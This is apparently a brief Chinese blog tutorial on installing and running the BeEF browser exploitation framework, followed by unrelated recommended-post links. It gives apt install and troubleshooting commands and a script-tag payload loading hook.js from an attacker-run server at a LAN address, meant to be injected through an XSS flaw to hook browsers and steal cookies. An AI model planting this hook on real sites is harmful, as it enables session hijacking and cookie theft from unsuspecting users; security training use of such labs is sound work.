day07beef-xss之根据beef-xss获取cookies

guowu6662024-05-11 20:52

1.安装

bash 复制代码 
apt-get update
apt-get install beef-xss

若报错运行不了尝试

apt remove ruby

apt remove beef-xss

apt-get install ruby

apt-get install ruby-dev libpcap-dev

gem install eventmachine

apt-get install beef-xss

2.运行

bash 复制代码 
beef-xss

运行成功会自动弹出浏览框。

bash 复制代码 
攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ,在beef-xss查看结果。

发送指令获取cookies

相关推荐
eason_fan20 小时前
Resize 事件导致的二进制内存泄漏:隐式闭包的 “隐形陷阱”
前端·性能优化
一只叫煤球的猫20 小时前
我做了一个“慢慢来”的开源任务管理工具:蜗牛待办(React + Supabase + Tauri)
前端·react.js·程序员
LYFlied20 小时前
AI时代下的规范驱动开发:重塑前端工程实践
前端·人工智能·驱动开发·ai编程
汉得数字平台21 小时前
汉得H-AI飞码——前端编码助手V1.1.2正式发布:融业务知识,提开发效能
前端·人工智能·智能编码
前端小万21 小时前
Jenkins 打包崩了?罪魁是 package.json 里的 ^
前端·jenkins
编程小白gogogo21 小时前
苍穹外卖前端环境搭建
前端
光影少年21 小时前
web端安全问题有哪些?
前端·安全
行走的陀螺仪21 小时前
Vite & Webpack 插件/Loader 封装完全指南
前端·webpack·node.js·vite·前端工程化·打包构建
1024肥宅21 小时前
浏览器网络请求 API:全面解析与高级封装(1)
前端·websocket·axios
小费的部落21 小时前
Excel 在Sheet3中 匹配Sheet1的A列和Sheet2的A列并处理空内容
java·前端·excel
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05BongoCat - 跨平台键盘猫动画工具06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07【AutoGLM部署】本地私有化部署AI手机Agent08Neo4j(一) - Neo4j安装教程(Windows)09Open-AutoGLM Windows 安装部署教程10Cursor 又偷偷更新,这个功能太实用:Visual Editor for Cursor Browser